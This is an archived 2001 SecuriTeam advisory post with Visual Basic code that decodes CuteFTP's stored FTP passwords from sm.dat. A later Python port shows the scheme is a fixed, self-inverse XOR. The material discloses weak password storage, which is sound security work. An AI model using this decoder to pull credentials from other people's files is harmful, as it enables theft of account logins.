[TOOL] Cute-FTP Stored Password Decoder
From: support@securiteam.com
Date: 08/31/01
From: support@securiteam.com
To: list@securiteam.com
Subject: [TOOL] Cute-FTP Stored Password Decoder
Message-Id: <20010831112502.2CD20138BF@mail.der-keiler.de>
Date: Fri, 31 Aug 2001 13:25:02 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Cute-FTP Stored Password Decoder
------------------------------------------------------------------------
DETAILS
This piece of VB code will decode the passwords stored in sm.dat for the
FTP accounts.
This works only if you did not set a password on the Site Manager!
Exploit code:
'Decode a single character
Public Function CuteDecode(i_Asc As Integer) As Integer
    'Invert the bits selected by mask 200 and keep the bits selected by mask 55
    CuteDecode = ((Not i_Asc) And 200) + (i_Asc And 55)
End Function

'Decode password
Public Function CuteDecodeString(str_password As String) As String
    Dim i As Integer
    CuteDecodeString = ""
    'Decode the stored string one character at a time
    For i = 1 To Len(str_password)
        CuteDecodeString = CuteDecodeString & _
            Chr$(CuteDecode(Asc(Mid(str_password, i, 1))))
    Next i
End Function
ADDITIONAL INFORMATION
The tool has been provided by E. van Elk (evelk@dsv.nl).
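
Added example (not part of the original advisory or E. van Elk's tool): a Python port of the CuteDecode expression that checks, over all 256 byte values, that the two masks reduce it to a fixed XOR with 0xC8 and that the transform is its own inverse, so the stored value is obfuscated with no secret rather than encrypted. The function names and the sample string are assumptions made for illustration.

```python
# Added example: port of the page's CuteDecode expression plus property checks.
NOT_MASK = 200   # 0xC8, mask applied to (Not i_Asc) on the page
AND_MASK = 55    # 0x37, mask applied to i_Asc on the page


def cute_decode(byte: int) -> int:
    """Port of CuteDecode: ((Not b) And 200) + (b And 55), limited to one byte."""
    return ((~byte & 0xFF) & NOT_MASK) + (byte & AND_MASK)


def xor_constant(not_mask: int, and_mask: int):
    """Return k if ((~b) & not_mask) + (b & and_mask) == b ^ k for every byte, else None."""
    # The masks must be disjoint and together cover all 8 bits; only then is
    # the sum a carry-free merge of the flipped bits and the untouched bits.
    if (not_mask & and_mask) or (not_mask | and_mask) != 0xFF:
        return None
    k = not_mask
    same = all(((~b & 0xFF) & not_mask) + (b & and_mask) == b ^ k
               for b in range(256))
    return k if same else None


def is_involution(fn) -> bool:
    """True when applying fn twice returns every byte value unchanged."""
    return all(fn(fn(b)) == b for b in range(256))


def transform(data: bytes) -> bytes:
    """Apply the per-byte transform; the same call encodes and decodes."""
    return bytes(cute_decode(b) for b in data)


if __name__ == "__main__":
    sample = b"Example-Pass1"   # constructed sample, not taken from any sm.dat
    stored = transform(sample)
    print("xor constant:", hex(xor_constant(NOT_MASK, AND_MASK)))
    print("self-inverse:", is_involution(cute_decode))
    print("round trip ok:", transform(stored) == sample)
```

Because the constant is the same for every installation, reading sm.dat is enough to recover the passwords, which matches the advisory's note that this applies when no Site Manager password is set.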